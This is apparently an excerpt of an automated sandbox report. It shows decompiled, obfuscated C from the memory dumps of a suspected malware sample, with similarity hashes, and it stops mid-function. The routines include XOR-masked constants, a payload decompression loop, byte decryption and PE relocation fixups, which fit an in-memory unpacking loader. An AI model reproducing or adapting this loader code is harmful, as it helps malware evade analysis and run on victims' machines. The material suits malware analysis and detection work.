        				 *_t169 =  *_t169 + _t169;
        				_t225 = _t224 + _t243;
        				 *_t225 =  *_t225 + _t187;
        				_t98 = _t96 + _t243 + _t233;
        				 *_t187 =  *_t187 + _t205;
        				_t188 = _t187 + _t233;
        				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
        				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
        				asm("cmc");
        				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
        				asm("clc");
        				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
        				asm("stc");
        				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
        				asm("sti");
        				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
        				 *_t188 =  *_t188 + 1;
        				asm("arpl [ecx], ax");
        				 *_t188 =  *_t188 + 1;
        				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
        				_t170 = _t169 +  *_t233;
        				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
        				asm("daa");
        				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
        				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
        				_t189 = _t188 +  *_t100;
        				_t102 = _t100 +  *_t100 + _t170;
        				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
        				asm("insb");
        				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
        				_t236 = _t233 + _t100 + _t171 + _t254;
        				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
        				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
        				_t104 = _t102 +  *_t191 + _t225;
        				_t237 = _t236 + _t225;
        				 *0xa3013803 = _t104;
        				asm("movsd");
        				_t246 = _t245 +  *_t104;
        				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
        				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
        				_push(_t225);
        				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
        				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
        				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
        				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
        				asm("rol byte [ebx], cl");
        				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
        				_push(0x6a03de01);
        				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
        				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
        				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
        				_t230 = _t229 + _t249;
        				asm("repne add ecx, [ebp+0x1]");
        				asm("repe add esi, [edi]");
        				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
        				asm("std");
        				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
        				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
        				_t111 = 0x3e +  *_t195 * 0x7e;
        				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
        				_t112 = _t111 + 0xc;
        				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
        				_t113 = _t112 + 1;
        				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
        				_t114 = _t113 + 0xf2;
        				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
        				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
        				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
        				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
        				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
        				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
        				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
        				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
        				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
        				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
        				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
        				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
        				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
        				_t127 = _t114 + 0x99a;
        				_t128 = _t127 + 0xc1;
        				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
        				_t133 = _t132 + 0xca;
        				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
        				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
        				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
        				asm("sbb eax, [esi]");
        				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 038b8b2086ffd4ebd3b80362caee626f5b3b7132b45edde1848e0dbd5fb9aea4
        • Instruction ID: 84227ed5195d8b676ea1bf1a709c55a9e423ef62d58408d25d6ee187098feb16
        • Opcode Fuzzy Hash: 038b8b2086ffd4ebd3b80362caee626f5b3b7132b45edde1848e0dbd5fb9aea4
        • Instruction Fuzzy Hash: B78192319893918BCB95DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fe6de227351c0e53021663ceb58515057b849770f81e67cd40c091ab9af20315
        • Instruction ID: 8673448d8bbdfa009ba710bba6443073889654fb50ddd1652dee078b87213a99
        • Opcode Fuzzy Hash: fe6de227351c0e53021663ceb58515057b849770f81e67cd40c091ab9af20315
        • Instruction Fuzzy Hash: D181F4742001199FCB48CF18C894EAA77A6FF8D318F598199F94A9B365DB30E891CF90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 88%
        			E02441000(signed int __ebx, void* __edi, signed int _a4, char* _a8, signed int _a12) {
        				signed int _v5;
        				signed int _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				signed int _v24;
        				signed int _v28;
        				char* _v32;
        				signed int _v36;
        				signed int _t80;
        				signed int _t87;
        				intOrPtr _t89;
        				intOrPtr _t92;
        				signed int _t114;
        				signed int _t116;
        				signed int _t132;
        				signed int _t148;
        				void* _t159;
        
        				asm("sbb [0x2449809], eax");
        				asm("adc [0x2449805], eax");
        				 *0x2449809 =  *0x2449809 | __ebx;
        				 *0x2449791 =  *0x2449791 - 0x244974d;
        				_v28 = (0x000020b6 ^  *(_a4 + 0x20)) + 0x00003f01 & 0x0000ffff;
        				_v5 = 0xed;
        				 *0x24497bd =  *0x24497bd + 0x684b;
        				_v32 =  &_v5;
        				 *0x2449739 =  *0x2449739 ^ 0x02449749;
        				asm("adc dword [0x24497fd], 0x3d75");
        				 *0x2449781 =  *0x2449781 | 0x0000181d;
        				 *_v32 = (_v5 ^ 0x0000003f) + 0x2f;
        				_v16 = 0xc6f8e435;
        				_v24 = 0xc6f8e434;
        				_t87 = _v16;
        				 *0x2449855 =  *0x2449855 ^ 0x0000608a;
        				_t80 = 0x2a823c2b;
        				 *0x24497d5 =  *0x24497d5 & _t87;
        				 *0x2449751 =  *0x2449751 + __edi;
        				asm("adc dword [0x24497b9], 0x3fe9");
        				_t89 = (_t87 ^ 0x2a823c2b) + 0x138527e2;
        				 *0x2449849 =  *0x2449849 + 0x2c9c;
        				_push(__ebx);
        				_v20 = _t89;
        				_v12 = 0xc6f8e04b;
        				 *0x24497c9 =  *0x24497c9 + _t89;
        				_push(__edi);
        				do {
        					asm("adc dword [0x2449811], 0x2449809");
        					 *0x2449809 =  *0x2449809 + 0x4869;
        					_t92 = (_v16 ^ _t80) + 0x138527e2;
        					while(1) {
        						 *0x244978d = 0x7e49;
        						 *0x244973d = 0x2565;
        						_v32 = _t92;
        						 *0x2449781 = 0x284c;
        						if(_v12 == 0xc6f8e664) {
        						}
        						L3:
        						 *0x2449745 = 0x1188;
        						if(_t92 < 0x40) {
        							 *((char*)(_t159 + _t92 - 0x60)) = _v5;
        							 *0x244984d = 0x40cb;
        							 *0x2449859 = 0x5a0d;
        							if(_t92 == 0x3f) {
        								 *0x244985d = 0x17e6;
        								L7:
        								 *0x2449845 =  *0x2449845 + 0x4af7;
        								 *0x24497d1 =  *0x24497d1 ^ 0x02449841;
        								_t132 = (_v16 ^ _t80) + 0x138527e2;
        								 *0x24497f9 = 0x193c;
        								 *0x2449785 = 0xe26;
        								if(_t132 != _v28) {
        									do {
        										_t116 =  *0x2449795; // 0xff4dd7d5
        										 *0x244974d =  *0x244974d & _t116;
        										 *0x2449779 =  *0x2449779 + 0x78a1;
        										 *0x24497c1 =  *0x24497c1 & 0x00001cae;
        										 *0x24497f9 =  *0x24497f9 + 0x2449739;
        										_v36 = (0x000020b6 ^  *(_a4 + 2 + _t132 * 4)) + 0x00003f01 & 0x0000ffff;
        										asm("sbb dword [0x244978d], 0x244980d");
        										 *0x2449795 =  *0x2449795 | 0x02449741;
        										 *0x2449739 =  *0x2449739 + 0x79e4;
        										 *0x2449805 = 0x571e;
        										 *((char*)(_t159 + _v36 - 0x60)) = ( *(_a4 + _t132 * 4) & 0x0000ffff ^ 0x000020b6) + 0x3f01;
        										 *0x2449849 = 0x6ac4;
        										 *0x2449859 = 0x1709;
        										_t132 = _t132 + 1;
        										 *0x2449751 = 0x33c4;
        									} while (_t132 != _v28);
        									 *0x244973d =  *0x244973d + ( *0x24497cd & 0x0000ffff);
        									_t92 = _v32;
        								}
        								asm("adc dword [0x24497fd], 0x3f84");
        								 *0x2449849 =  *0x2449849 ^ 0x000016be;
        								 *0x244978d = 0x6357;
        								 *_a12 = (_v16 ^ _t80) + 0x138527e2;
        							}
        							 *0x2449791 = 0x630a;
        							_t92 = _t92 + 1;
        							 *0x244978d = 0x7e49;
        							 *0x244973d = 0x2565;
        							_v32 = _t92;
        							 *0x2449781 = 0x284c;
        							if(_v12 == 0xc6f8e664) {
        							}
        						}
        						L6:
        						 *0x24497f9 =  *0x24497f9 + 0x24497c9;
        						asm("sbb dword [0x2449791], 0x70ba");
        						 *0x24497b9 =  *0x24497b9 & 0x0244983d;
        						_t148 = (_v12 ^ _t80) - (_v24 ^ _t80) - 0x138527e2 ^ _t80;
        						 *0x244974d = 0x4bed;
        						_v12 = _t148;
        						if(_t148 == 0xc6f8e38a) {
        							goto L7;
        						}
        						break;
        					}
        				} while (_v12 != 0xc6f8e478);
        				_a4 = 0xc6f8d435;
        				while((_a4 ^ _t80) + 0x138527e2 != 0) {
        					if( *((intOrPtr*)(_t159 + _v20 - 0x60)) == _v5) {
        						L18:
        						_v20 = (_v24 ^ _t80) + _v20 + 0x138527e2;
        						_a8 = _a8 + 1;
        						continue;
        					} else {
        						_a4 = (_a4 ^ _t80) - (_v24 ^ _t80) - 0x138527e2 ^ _t80;
        						if( *((intOrPtr*)(_t159 + _v20 - 0x60)) == _v5) {
        							goto L18;
        						} else {
        							if( *((intOrPtr*)(_t159 + _v20 - 0x60)) ==  *_a8) {
        								if( *_a8 == (_v16 ^ _t80) + 0x138527e2) {
        									break;
        								} else {
        									goto L18;
        								}
        							}
        						}
        					}
        					L21:
        					return _t80;
        				}
        				_t114 = _v24 ^ _t80;
        				_t80 = _a12;
        				 *_t80 = _t114 + 0x138527e2;
        				goto L21;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f6c99eb28e91308eb842a03ce732a7b6933293411bca372faf6c429f5226026c
        • Instruction ID: a6639a365cfea59c5285d7816df59a8291d2b46e3491e0926dc6b7352444ef56
        • Opcode Fuzzy Hash: f6c99eb28e91308eb842a03ce732a7b6933293411bca372faf6c429f5226026c
        • Instruction Fuzzy Hash: BC91CE78E84755CFEB08CF68E4949AF7BF2FB58318B10885EC44A97381DB781566EB40
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E02459F88(intOrPtr __eax, signed int _a4, intOrPtr _a8) {
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				signed short _v24;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _v40;
        				signed int _v44;
        				signed int _v48;
        				signed int _v52;
        				signed int _v56;
        				signed int _t98;
        				signed short _t149;
        				signed short _t182;
        
        				_v16 = 0xc6f8e435;
        				_v28 = 0xc6f8e434;
        				_v32 = 0xc6f8e40b;
        				_v12 = 0xc6f8e454;
        				_v36 = 0xc6f8e474;
        				_v48 = 0xc6f8e4b3;
        				_v48 = 0xc6f8e453;
        				_v20 = __eax;
        				_v24 = _a4;
        				if(_v20 == (_v16 ^ 0x2a823c2b) + 0x138527e2 || _v24 == (_v16 ^ 0x2a823c2b) + 0x138527e2) {
        					L20:
        					_t98 = _v28;
        				} else {
        					_v40 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
        					_v44 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
        					_v12 = (_v12 ^ 0x00003c2b) + 0x27e2 - (_v36 ^ 0x00003c2b) + 0x27e2;
        					while(1) {
        						_a4 =  *((intOrPtr*)(_v20 + _v40 * 2));
        						_v8 =  *((intOrPtr*)(_v24 + _v44 * 2));
        						if(_a4 == (_v16 ^ 0x00003c2b) + 0x27e2) {
        							break;
        						}
        						if(_v8 == (_v16 ^ 0x00003c2b) + 0x27e2) {
        							_v28 = (_v16 ^ 0x2a823c2b) + _v28 + 0x138527e2;
        							L18:
        							_v52 = _v40 - 0x138527e2 ^ 0x2a823c2b;
        							_v56 = _v44 - 0x138527e2 ^ 0x2a823c2b;
        							if((( *(((_v32 ^ 0x2a823c2b) + 0x138527e2) * ((_v52 ^ 0x2a823c2b) + 0x138527e2) + _v20) & 0x0000ffff) - 0x138527e2 ^ 0x2a823c2b) != (( *(((_v32 ^ 0x2a823c2b) + 0x138527e2) * ((_v56 ^ 0x2a823c2b) + 0x138527e2) + _v24) & 0x0000ffff) - 0x138527e2 ^ 0x2a823c2b)) {
        								goto L20;
        							} else {
        								_t98 = _v16;
        								if((( *(((_v32 ^ 0x2a823c2b) + 0x138527e2) * ((_v52 ^ 0x2a823c2b) + 0x138527e2) + _v20) & 0x0000ffff) - 0x138527e2 ^ 0x2a823c2b) != _v16) {
        									goto L20;
        								}
        							}
        						} else {
        							_t182 = _v8;
        							_t149 = _a4;
        							if(_a8 == (_v16 ^ 0x2a823c2b) + 0x138527e2) {
        								L13:
        								if(_t149 != _t182) {
        									goto L20;
        								} else {
        									goto L14;
        								}
        							} else {
        								if(_t149 == _t182) {
        									L14:
        									_v20 = (_v32 ^ 0x2a823c2b) + _v20 + 0x138527e2;
        									_v24 = (_v32 ^ 0x2a823c2b) + _v24 + 0x138527e2;
        									continue;
        								} else {
        									if(_a4 >= (_v36 ^ 0x00003c2b) + 0x27e2 && _a4 <= (_v48 ^ 0x00003c2b) + 0x27e2) {
        										_a4 = (_a4 & 0x0000ffff) + (_v12 & 0x0000ffff);
        									}
        									if(_v8 >= (_v36 ^ 0x00003c2b) + 0x27e2 && _v8 <= (_v48 ^ 0x00003c2b) + 0x27e2) {
        										_v8 = (_v8 & 0x0000ffff) + (_v12 & 0x0000ffff);
        									}
        									_t182 = _v8;
        									_t149 = _a4;
        									goto L13;
        								}
        							}
        						}
        						goto L21;
        					}
        					_v16 = ((_v28 ^ 0x2a823c2b) + 0x138527e2) * _v16;
        					goto L18;
        				}
        				L21:
        				return (_t98 ^ 0x2a823c2b) + 0x138527e2;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6a8d0f4976fb5cdb84c7712954a7227c02341357d3eff4a4510478783533168c
        • Instruction ID: 6af0b33f97d6636b3c8f92de452d3e4087cb34ee6daa06a5257628549b7c77d6
        • Opcode Fuzzy Hash: 6a8d0f4976fb5cdb84c7712954a7227c02341357d3eff4a4510478783533168c
        • Instruction Fuzzy Hash: DC711C36E101299FDB14DFA9C9405EEF7B2FF8C750B5A8566D854BB300D734AA42CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 98%
        			E00413E5D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
        				signed int _v8;
        				signed int _v12;
        				intOrPtr* _v16;
        				signed int _v20;
        				unsigned int _t67;
        				signed int _t68;
        				intOrPtr _t71;
        				void* _t79;
        				signed int _t81;
        				intOrPtr _t87;
        				intOrPtr _t88;
        				signed int _t98;
        				signed int _t99;
        				signed int _t100;
        				signed int _t101;
        				signed int _t102;
        				unsigned int _t103;
        				signed int _t104;
        				signed int _t106;
        				signed int _t108;
        				signed int _t111;
        				signed int _t115;
        				signed int _t116;
        				intOrPtr* _t119;
        				unsigned int _t125;
        				signed int _t126;
        				signed int _t128;
        
        				_t71 = _a4;
        				_t98 = 0;
        				_t99 = 0;
        				_v16 = 0;
        				_v20 = 1;
        				L1:
        				while(1) {
        					if(_t99 == 0) {
        						_t103 =  *(_t98 + _t71);
        						_t98 = _t98 + 4;
        						_t99 = 0x1f;
        						_t104 = _t103 >> 0x1f;
        					} else {
        						_t99 = _t99 - 1;
        						_t104 = _t67 >> _t99 & 0x00000001;
        					}
        					if(_t104 != 0) {
        						_v16 = _v16 + 1;
        						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
        						_t98 = _t98 + 1;
        						L6:
        						_t71 = _a4;
        						continue;
        					}
        					_v12 = 1;
        					do {
        						if(_t99 == 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t100 = 0x1f;
        							_t106 = _t67 >> 0x1f;
        						} else {
        							_t100 = _t99 - 1;
        							_t106 = _t67 >> _t100 & 0x00000001;
        						}
        						_v12 = _t106 + _v12 * 2;
        						if(_t100 == 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t99 = 0x1f;
        							_t108 = _t67 >> 0x1f;
        						} else {
        							_t99 = _t100 - 1;
        							_t108 = _t67 >> _t99 & 0x00000001;
        						}
        					} while (_t108 == 0);
        					_t111 = _v12;
        					if(_t111 == 2) {
        						_t81 = _v20;
        						L19:
        						_v12 = _t81;
        						if(_t99 == 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t101 = 0x1f;
        							_v8 = _t67 >> 0x1f;
        						} else {
        							_t101 = _t99 - 1;
        							_v8 = _t67 >> _t101 & 0x00000001;
        						}
        						if(_t101 == 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t99 = 0x1f;
        							_t115 = _t67 >> 0x1f;
        						} else {
        							_t99 = _t101 - 1;
        							_t115 = _t67 >> _t99 & 0x00000001;
        						}
        						_t116 = _t115 + _v8 * 2;
        						_v8 = _t116;
        						if(_t116 == 0) {
        							_v8 = 1;
        							do {
        								if(_t99 == 0) {
        									_t125 =  *(_t98 + _t71);
        									_t98 = _t98 + 4;
        									_t102 = 0x1f;
        									_t126 = _t125 >> 0x1f;
        								} else {
        									_t102 = _t99 - 1;
        									_t126 = _t67 >> _t102 & 0x00000001;
        								}
        								_v8 = _t126 + _v8 * 2;
        								if(_t102 == 0) {
        									_t67 =  *(_t98 + _t71);
        									_t98 = _t98 + 4;
        									_t99 = 0x1f;
        									_t128 = _t67 >> 0x1f;
        								} else {
        									_t99 = _t102 - 1;
        									_t128 = _t67 >> _t99 & 0x00000001;
        								}
        							} while (_t128 == 0);
        							_v8 = _v8 + 2;
        						}
        						asm("sbb ecx, ecx");
        						_v8 = _v8 +  ~0xd00;
        						_t87 = _v16;
        						_t119 = _t87 - _v12 + _a12;
        						_v16 = _t119;
        						 *((char*)(_t87 + _a12)) =  *_t119;
        						_t88 = _t87 + 1;
        						_v16 = _v16 + 1;
        						do {
        							 *((char*)(_t88 + _a12)) =  *_v16;
        							_t88 = _t88 + 1;
        							_v16 = _v16 + 1;
        							_t57 =  &_v8;
        							 *_t57 = _v8 - 1;
        						} while ( *_t57 != 0);
        						_v16 = _t88;
        						goto L6;
        					}
        					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
        					_t98 = _t98 + 1;
        					if(_t79 != 0xffffffff) {
        						_t81 = _t79 + 1;
        						_v20 = _t81;
        						goto L19;
        					}
        					_t68 = _a16;
        					 *_t68 = _v16;
        					return _t68 & 0xffffff00 | _t98 == _a8;
        				}
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ce31d1979fd9319f339b4cc567b59426a31eda7a677de6bf59c0d1099e92a161
        • Instruction ID: 1e5b42afd7867fdbe3c4646a7ed1ab2e66daf4721927dd91ad809288241edded
        • Opcode Fuzzy Hash: ce31d1979fd9319f339b4cc567b59426a31eda7a677de6bf59c0d1099e92a161
        • Instruction Fuzzy Hash: CD51E532E006259BDB14CE5CC4506EDF7B1EF85724F1A42AADD06BF785C634AE82DB84
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0245A9BA(signed int _a4, intOrPtr _a8, signed int _a11, signed int _a12) {
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				intOrPtr _v24;
        				signed int _v28;
        				signed int _t63;
        				signed char _t90;
        				signed int _t121;
        
        				_v8 = 0xc6f8e435;
        				_v28 = 0xffffffffc6f8e434;
        				if(_a4 == (_v8 ^ 0x2a823c2b) + 0x138527e2 || _a8 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        					_t63 = _v8;
        				} else {
        					_v12 = _a12;
        					_v24 = _a8;
        					_a8 = 0xc6f8e52d;
        					_a8 = 0xc6f8e409;
        					_v20 = 0xc6f8e435;
        					_a4 = 0xffffffffc6f8e434;
        					_v8 = 0xc6f8e40b;
        					_v16 = _a4;
        					_a12 = 0xec7ad81e - (_a4 ^ 0x2a823c2b) + _v24;
        					_a8 = 0xc6f8e408;
        					while(_v8 != 0xc6f8e435) {
        						if(_a12 % ((_a4 ^ 0x2a823c2b) + (_a4 ^ 0x2a823c2b) + 0x270a4fc4) == (_v8 ^ 0x2a823c2b) - (_a4 ^ 0x2a823c2b)) {
        							_t90 =  *(_a12 + _v16);
        							_a11 = 0xee;
        							if(_v12 == 0) {
        								_a11 = (_a11 & 0x000000ff) + _v12;
        								_a11 = ((_v20 ^ 0x2a823c2b) + 0x138527e2) * (_a11 & 0x000000ff);
        								_a11 = (_t90 ^ 0x0000003f) + 0x2f + (_a11 & 0x000000ff);
        								_t90 = _a11;
        							}
        							 *(_a12 + _v16) = _t90;
        						}
        						if((_a12 - 0x138527e2 ^ 0x2a823c2b) != _v20) {
        							_t121 = 0xec7ad81e - (_a4 ^ 0x2a823c2b) + _a12;
        						} else {
        							_v8 = (_v8 ^ 0x2a823c2b) - (_a4 ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
        							_t121 = 0xec7ad81e - (_a4 ^ 0x2a823c2b) + _v24;
        						}
        						_a12 = _t121;
        					}
        					_t63 = _v28;
        				}
        				return (_t63 ^ 0x2a823c2b) + 0x138527e2;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E024598C3(intOrPtr _a4, intOrPtr _a8) {
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				signed int _v20;
        				unsigned int _v24;
        				char _v28;
        				signed int _v32;
        				signed int _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				signed int _t71;
        				intOrPtr* _t78;
        				intOrPtr _t80;
        				signed short* _t83;
        				unsigned int _t94;
        				intOrPtr _t112;
        				signed int _t121;
        
        				_v8 = 0xc6f8e435;
        				_v44 = 0xc6f8e434;
        				if(_a4 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        					_t71 = _v8;
        				} else {
        					_a8 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
        					_v32 = 0xc6f8e408;
        					if( *((intOrPtr*)(_a8 + (_v32 ^ 0x2a823c2b) * 8 - 0x63d6c078)) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        						_t78 = _a4 +  *((intOrPtr*)(_a8 + 0xa0));
        						_t112 = _a4 -  *((intOrPtr*)(_a8 + 0x34));
        						_v40 = _t112;
        						if(_t112 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        							_v12 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        							_v20 = 0xc6f8e40a;
        							while(1) {
        								_t80 =  *((intOrPtr*)(_t78 + 4));
        								_v16 = _t80;
        								if(_t80 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        									break;
        								}
        								_t121 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        								_t94 = _t80 - 8 >> 1;
        								if(_t121 < _t94) {
        									_t83 = _t78 + 8 + _t121 * 2;
        									_v28 = _t94 - _t121;
        									do {
        										_v24 =  *_t83 & 0xfff;
        										_v36 = _v24 +  *_t78 - 0x138527e2 ^ 0x2a823c2b;
        										_v24 = ( *_t83 & 0x0000ffff) >> 0xc;
        										_v36 = (_v36 ^ 0x2a823c2b) + _a4 + 0x138527e2;
        										if(_v24 == (_v20 ^ 0x2a823c2b) + 0x138527e2 && _v24 == (_v20 ^ 0x2a823c2b) + 0x138527e2) {
        											 *_v36 =  *_v36 + _v40;
        										}
        										_t83 =  &(_t83[1]);
        										_t50 =  &_v28;
        										 *_t50 = _v28 - 1;
        									} while ( *_t50 != 0);
        									_t80 = _v16;
        								}
        								_v12 = _v12 + _t80;
        								if(_v12 <  *((intOrPtr*)(_a8 + (_v32 ^ 0x2a823c2b) * 8 - 0x63d6c074))) {
        									_t78 = _t78 + _v16;
        									continue;
        								}
        								break;
        							}
        						}
        					}
        					_t71 = _v44;
        				}
        				return (_t71 ^ 0x2a823c2b) + 0x138527e2;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0245AB1C(signed int _a4, signed int _a7) {
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				signed int _v24;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				void* __ebx;
        				signed int _t64;
        				intOrPtr* _t83;
        				void* _t125;
        
        				_v24 = 0xc6f8e435;
        				_v16 = 0xc6f8e434;
        				_v28 = 0xc6f8e535;
        				_v32 = 0xc6f8e436;
        				_v12 = (_v24 ^ 0x2a823c2b) + 0x138527e2;
        				_v36 = 0xc6f8e40d;
        				_v8 = 0xf0b16715;
        				_v20 = 8;
        				_t64 = ((_v16 ^ 0x2a823c2b) + 0x138527e2) * ((_v24 ^ 0x2a823c2b) + 0x138527e2);
        				while(1) {
        					_v8 = _t64;
